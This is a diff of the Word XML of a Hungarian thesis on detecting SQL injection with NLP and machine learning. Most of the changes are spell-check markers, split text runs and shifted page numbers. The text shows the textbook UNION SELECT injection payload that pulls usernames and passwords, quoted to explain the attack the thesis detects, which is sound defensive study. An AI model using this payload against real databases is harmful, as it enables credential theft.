   <w:num w:numId="8">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -154,8 +154,174 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>detection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>using</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>natural</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>language</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>processing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>systems</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>learning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -881,15 +1047,33 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egy kód SQL injection</w:t>
-      </w:r>
+        <w:t xml:space="preserve">egy kód SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">beli </w:t>
+        <w:t>injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>beli</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1029,39 +1213,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>IntelliJ</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Visual </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> fejlesztői környezetet</w:t>
-      </w:r>
+        <w:t>Studio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, e</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">mellett a gépi tanulás során Python, </w:t>
-      </w:r>
+        <w:t>Code</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a grafikus </w:t>
+        <w:t xml:space="preserve"> fejlesztői környezetet</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1069,7 +1257,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">asztali </w:t>
+        <w:t>, e</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1077,7 +1265,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>felület megvalósításához</w:t>
+        <w:t xml:space="preserve">mellett a gépi tanulás során Python, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1085,7 +1273,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">a grafikus </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1093,8 +1281,42 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">asztali </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>felület megvalósításához</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>Java</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>FX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1167,7 +1389,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A program a bemenetként megadott PHP kódra</w:t>
+        <w:t xml:space="preserve">A program </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1175,7 +1397,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">grafikus felületen </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1183,7 +1405,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>kimenetként</w:t>
+        <w:t>a bemenetként megadott PHP kódra</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1199,7 +1421,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egy </w:t>
+        <w:t>kimenetként</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1207,7 +1429,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">százalékos értéket </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1215,31 +1437,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ad, amely a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kód</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>sérülékenységének mértéke</w:t>
+        <w:t>meghatározza azt, hogy a kód milyen valószínűséggel sérülékeny</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1324,8 +1522,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> train/test készlet,</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1334,8 +1533,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1344,7 +1544,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>/test készlet,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1354,7 +1554,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1364,7 +1564,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1374,8 +1574,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">onfusion mátrix, </w:t>
-      </w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1384,7 +1585,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>r</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1394,8 +1595,9 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ecal</w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1404,8 +1606,82 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ecal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs/>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>l</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -3347,7 +3623,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>21</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3421,7 +3697,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>20</w:t>
+              <w:t>22</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3495,7 +3771,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3569,7 +3845,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>24</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3643,7 +3919,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4049,7 +4325,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A téma</w:t>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>téma</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4057,6 +4340,7 @@
         </w:rPr>
         <w:t>megnevezés</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -4125,7 +4409,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>The Open Web Application Security Project</w:t>
+        <w:t xml:space="preserve">The Open Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Application</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Security</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Project</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4295,119 +4607,52 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>' UNION SELECT username, password FROM user</w:t>
-      </w:r>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">-- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[1]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">megadása </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a bemenet sérülékeny</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">létezik </w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tábla, valamint </w:t>
-      </w:r>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> oszlop:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>user</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4415,8 +4660,263 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
-      </w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megadása </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a bemenet sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">létezik </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tábla, valamint </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oszlop:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>description</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>category</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = ’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Gifts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">’ UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -4554,18 +5054,33 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-band</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, classic</w:t>
-      </w:r>
+        <w:t>(in-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
